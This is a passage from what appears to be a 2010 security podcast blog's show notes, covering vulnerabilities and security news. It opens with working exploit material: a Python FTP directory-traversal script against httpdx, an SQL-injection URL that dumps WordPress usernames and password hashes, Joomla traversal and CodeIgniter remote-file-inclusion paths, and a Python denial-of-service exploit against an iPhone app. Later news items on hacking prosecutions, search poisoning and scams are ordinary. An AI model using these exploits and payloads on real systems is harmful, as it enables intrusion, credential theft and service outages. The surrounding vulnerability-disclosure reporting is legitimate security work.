    # Author: FB1H2S
    # Software Link: http://sourceforge.net/projects/httpdx/
    # Version: v1.5
    # Tested on: WIN XP2
    # CVE : [if exists]
    # Code : Attached

    #!/usr/bin/python
    # Greetz to all Darkc0de, Andhra Hackers and ICW Memebers
    #Thanks : Mr bond,Wipu,GOdwinAustin,The_empty,beenu,hg_H@x0r,r45c4l,it_security,eberly
    #Shoutz : SMART_HAX0R,j4ckh4x0r,41w@r10r,Hackuin
    import socket
    import sys
    hostname=’localhost’
    username=’admin’
    passwd=’password’
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
    sock.connect((hostname, 21))
    except:
    print (“Connection error!”)
    sys.exit(1)
    r=sock.recv(1024)
    sock.send(“user %s\r\n” %username)
    r=sock.recv(1024)
    sock.send(“pass %s\r\n” %passwd)
    r=sock.recv(1024)
    # The FTP root is example.com we could move down the root directory
    sock.send(“MKD ../fb1h2s\r\n”)
    sock.close()
    sys.exit(0);

  7. The Copperleaf Photolog plugin for WordPress is subject to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Example URL: http://www.sample.com/wp-content/plugins/cpl/cplphoto.php?postid=11+and+1=1+union+all+select+1,2,concat(user_login,0x3a,user_pass),4,5,6,7,8,9,10,11,12+from+wp_users–&amp;id=11
  8. The AllVideos component for Joomla! is subject to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data. Exploiting the issue may allow an attacker to obtain sensitive information that could aid in further attacks. Example URL: http://www.sample.com/plugins/content/jw_allvideos/includes/download.php?file=./../…/file.php
  9. CodeIgniter v1.0 is subject to a Remote File Inclusion Vulnerability.  Exploit URLs: /system/database/DB_active_rec.php?BASEPATH=[Shell.txt?]
    /system/database/DB_driver.php?BASEPATH=[Shell.txt?]
  10. Apple iPhone and iPod are subject to a DBlite Remote DOS exploit.  Proof of concept code is available:
    #!/usr/bin/python
    #
    # Apple Iphone/Ipod – My DBLite Edition #Remote 0day DOS exploit
    # Found by: Jason Bowes – admin @ blue-#dogz.com
    # App Homepage: www.xenugo.co
    # Price: Free
    # Download: From the app store (use your #itunes account)
    # Tested on: Iphone 3GS – firmware 3.1.2
    # What’s up to slicc1
    # Advisory: ()

    print “[+] Apple Iphone/Ipod – My DB lite edition Remote DOS exploit”

    import ftplib

    from ftplib import FTP

    import sys

    import socket

    def Usage():

    print (“Usage:  ./mydblite.py <serv_ip>\n”)

    print (“Example:./mydblite.py 192.168.1.3\n”)

    if len(sys.argv) <> 2:

    Usage()

    sys.exit(1)

    else:

    hostname = sys.argv[1]

    delete = “$A$A$A” * 10000000

    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    try:

    sock.connect((hostname, 29161))

    print “[+] Connecting to the target..”

    except:

    print (“[-] Connection error!”)

    sys.exit(1)

    r=sock.recv(1024)

    print “[+] Sending payload..boom..boom..pow”

    sock.send(“DELE %s\r\n” %delete)

    print “[+] Server should now be DoS’d!”

    sys.exit(0);

News Items of Interest:

News item 1: http://www.wired.com/threatlevel/2010/02/max-vision-sentencing/

Max Ray Vision, 37,was sentenced Friday to 13 years in federal prison for stealing nearly two million credit card numbers from banks, businesses and other hackers — in what is the longest hacking sentence in U.S. history.  He was also ordered to pay $27.5 million in restitution, and to serve five years under court supervision following his release, during which time he’ll be allowed to use computers only for legitimate employment or education.

Vision, who changed his name from Max Butler shortly before his arrest, ran an online forum for thousands of identity thieves called CardersMarket, where he sold credit card magstripe data to the underground for about $20 a card. He was caught with 1.8 million stolen credit card numbers belonging to a thousand different banks, who tallied the fraudulent charges on the cards at $86.4 million.

He faced up to life in prison under federal sentencing guidelines. But prosecutor Luke Dembosky on Friday recommended the significantly lower 13-year sentence, noting that Vision has provided substantial assistance to the government during his time in pre-trial custody.
Vision’s 13-year term is the longest U.S. hacking sentence, though that record likely will be eclipsed next month when confessed TJX hacker Albert Gonzalez faces the first of two sentencing hearings. One of Gonzalez’s plea agreements contemplates a term of 17 to 25 years in prison.

News item 2: http://www.reuters.com/article/idUSTRE61E3R420100215?type=sportsNews
A French judge has issued an arrest warrant for American cyclist on Monday, according to Reuters.  French judge Thomas Cassuto issued the international arrest warrant for Floyd Landis after an anti-doping computer laboratory had its computer system hacked.

It seems that (Landis) hacked into the lab computer systems to try to prove the laboratory was wrong.  In his court case, the one-time 2006 Tour de France winner, showed many documents he got allegedly obtained by hacking to numerous sporting instances.   The judge traced a network of hackers back to the ringleader.

News item 3: http://isc.sans.org/diary.html?storyid=8239
SANS is reporting that they’ve received reports about the (sadly expected by now) search engine poisoning for various Olympics related terms. For example the name of the killed Georgian luge athlete is used to redirect unsuspecting users to fake anti virus and other malicious content. The redirect is browser dependent. Firefox is usually redirected to “qooglesearch.com” (note the ‘q’ as first letter instead of a ‘g’). It is probably advisable to watch out for DNS requests for this domain to spot possible infections. Internet explorer is redirected to a wide range of different domains which apparently are picked at random.

http://www.youtube.com/results?search_query=Gillian+Cooke&page=&utm_source=opensearch

News item 4: http://economy.kansascity.com/?q=node/6089
Internet scammers spread false rumors of actor Bill Cosby’s death on message boards to try to trick users into parting with their cash and personal details, according to Sophos Plc, a U.K. provider of security software.

After messages posted to blogs and on Twitter said he had died, the actor made a statement on his Web site assuring his fans he was still alive. Scammers had created Web sites that advertised the news to lure Web users to download fake antivirus software.

Fake Cosby reports are not the first such celebrity scare story to be used to lure Web users into parting with credit card details or accepting viruses. Earlier this year, Internet postings said Johnny Depp had died in a car accident in France and in 2004 California Governor Arnold Schwarzenegger was reported dead by scammers.
News item 5:http://blog.brickhousesecurity.com/2010/02/15/top-5-gps-knew/
So we all know the obvious reasons why GPS devices have become necessary in the average person’s life. Used to track packages, family members, and business assets, GPS trackers have become more and more commonplace. However, there are several uses for GPS tracking that you may never have heard about before.

1) Tracking Wildlife

If you think it’s hard to find where your house cat is napping on an arbitrary day, consider the difficulties associated with tracking wildlife. Animals can be monitored using GPS trackers for reasons that range from information gathering to human interest. For example, scientists recently used GPS trackers to observe the habits of Arctic wolves.

2) Bus Tracking/Schedules

As any commuter knows, the existence of a schedule does not correlate with the bus being on time all the time. In selected areas, commuters are now lucky to benefit from the improved convenience of mass transit thanks to GPS tracking. If the GPS tracking works for these communities, maybe in the future the systems will be expanded to include other areas and more commuters. Pike County recently began using Sprint’s GPS system to track school buses. Parents’ concerns over the safety of their children is now relieved, as the GPS system can tell in real-time the location of the bus as well as the mileage and speed.

3) Tracking Alzheimer’s Patients

Anyone who has a loved one afflicted with Alzheimer’s Disease understands the worry and ramifications associated with wandering. Alzheimer’s can cause someone to wander and possibly forget their home address. Having patients wear GPS devices can help ensure their safety because loved ones or hospital faculty can log online and see exactly where the person is. To tap into this technology Indiana state legislature passed the Silver Alert Program over the summer of 2009. The Silver Alert program, similar to the Amber Alert but for the elderly with Alzheimer’s, is still in a testing phase.

4) Boat Races

Why would anyone think to put a GPS device in boats during a race? The participants know where they are headed (well, one would hope), so the GPS wouldn’t make sense in its primary purpose. In fact, Michigan.org cleverly thought to implant GPS devices so that they could broadcast the locations of over 200 boats in real-time.

5) Sports

Even the world of sports can benefit from GPS tracking. From protecting valuable possessions and important people to monitoring if the last hit an athlete took was one too many, the sports world is being transformed with the help of GPS systems. You can watch cycling events with GPS tracking so that you can see where your favorite (non-hacker) cyclist is located within the course or peloton.

News item 6:

A recent survey found the Top 10 office annoyances were:

  • Grumpy or moody colleagues (37 percent)
  • Slow computers (36)
  • Small talk/gossip in the office (19)
  • The use of office jargon or management-speak (18)
  • People speaking loudly on the phone (18)
  • Too much health and safety in the work place (16)
  • Poor toilet etiquette (16)
  • People not turning up for meetings on time or at all (16)
  • People not tidying up after themselves in the kitchen (15)
  • Too cold/cold air conditioning (15)

The most annoying jargon:

  • Thinking outside the box (21 percent)
  • Let’s touch base (20)
  • Blue sky thinking (19)
  • Blamestorming (16) (sitting down and working out whose fault something is)
  • Drill down to a more granular level (15) (Look into something in more detail)
  • Let’s not throw pies in the dark (15) (we need a plan rather than a haphazard approach)
  • I’ve got that on my radar (13)
  • Push the envelope (12)
  • Bring your A-game (11) (Be ready to do something to best of ability)
  • Get all your ducks in a row (11)
2010
02.15

Happy President’s Day

Category: Main / Tags: no tag / Add Comment

No podcast today due to Holiday.

« Previous Entries